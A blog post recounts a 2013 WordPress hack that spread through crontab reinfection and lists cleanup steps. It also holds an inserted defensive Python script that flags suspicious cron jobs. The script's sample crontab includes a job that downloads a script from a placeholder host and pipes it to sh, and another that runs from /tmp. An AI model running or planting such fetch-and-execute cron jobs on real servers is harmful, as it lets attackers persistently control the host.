In February 2013, my WordPress-based website www.nickezzo.com was compromised (hacked) by an overseas-based person or group. The hacker exploited a known weakness in WordPress to execute a SQL injection and take control of the server and several of my websites. I found strange files hidden within the WordPress directories that had names that were remarkably similar to WordPress filenames. I found weird entries in the database that pointed to other sites across the Internet, mostly in Russia.
Soon, people were emailing and Tweeting me that my site was out of control and spamming people with a fake PayPal email. Some people were really pissed off, and I can’t say I blame them. Having your website compromised is one of the worst things that can happen to an online marketer. It’s like having your car stolen, then having that stolen car used to commit unspeakable crimes.
Over the course of several weeks, I repeatedly cleaned the site of all traces of malware. Each time I thought I had finished, somehow all the offending files, database entries, and other bits of code reappeared within a few days. I must have cleaned the site top to bottom five times within a three-week period. Eventually, I realized that the hacker had infected the crontab, instructing the server to re-spread the malware across my websites.
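Because the reinfection came from the crontab, a cleanup has to review scheduled jobs as well as files and database rows. The following is an added example, not code from the original post: a small Python audit that flags cron jobs matching a few heuristics. The rules, the function names, and the sample crontab (including the placeholder host example.invalid) are assumptions constructed for illustration.

```python
import re

# Heuristics chosen for this example (assumptions, not taken from the post).
RULES = [
    ("download piped to interpreter",
     re.compile(r"\b(curl|wget|fetch)\b[^|;]*\|\s*(sh|bash|php|perl|python\d?)\b")),
    ("decodes an embedded payload",
     re.compile(r"base64\s+(-d|--decode)|\beval\b")),
    ("runs from a temp or upload directory",
     re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|wp-content/uploads/)")),
]
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_command(line, system=False):
    """Return the command part of a crontab line, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    skip = 1 if line.startswith("@") else 5   # @reboot etc. vs five time fields
    if system:
        skip += 1                              # /etc/crontab adds a user column
    parts = line.split(None, skip)
    return parts[skip] if len(parts) > skip else None

def audit_crontab(text, system=False):
    """Return (line_number, reason, command) for each job matching a rule."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        command = cron_command(line, system)
        if command is None:
            continue
        for reason, pattern in RULES:
            if pattern.search(command):
                findings.append((number, reason, command))
    return findings

# Constructed sample crontab; example.invalid is a placeholder host.
SAMPLE = """\
MAILTO=""
# m h dom mon dow command
15 3 * * * /usr/bin/php /home/site/public_html/wp-cron.php
*/10 * * * * wget -q -O - http://example.invalid/u.txt | sh
@reboot /tmp/.cache/wp-updater >/dev/null 2>&1
0 4 * * 0 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for number, reason, command in audit_crontab(SAMPLE):
        print(f"line {number}: {reason}: {command}")
```

Feed it the output of `crontab -l` for each account, and pass `system=True` for `/etc/crontab` and files under `/etc/cron.d`, which carry an extra user column.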
Here’s how I eventually fixed the problem:
- Moved the site off the dedicated Linux server to shared hosting providers. For this I used GoDaddy and SiteGround (for different sites). Both of these providers can help prevent and remove malware from infected sites.
- Re-posted every entry by hand to make sure no code was inadvertently copied to the new provider.
- Installed two WordPress plug-ins to scan and secure the sites:
  - Sucuri SiteCheck Malware Scanner: Deep malware scanning, 1-click hardening, last logins, WordPress integrity check.
  - BulletProof Security (BPS): Locks down .htaccess and other key files, provides a detailed security log.
- Signed up with Incapsula to create an extra barrier between the hackers and my website. In the last 30 days, the Incapsula service has blocked 38 “Bad Bots” from reaching my site.
Hopefully, anyone reading this will take more care than I did to prevent this from happening to them. Trust me when I say that having your website spam people is a great way to make people hate you. Good luck and stay safe!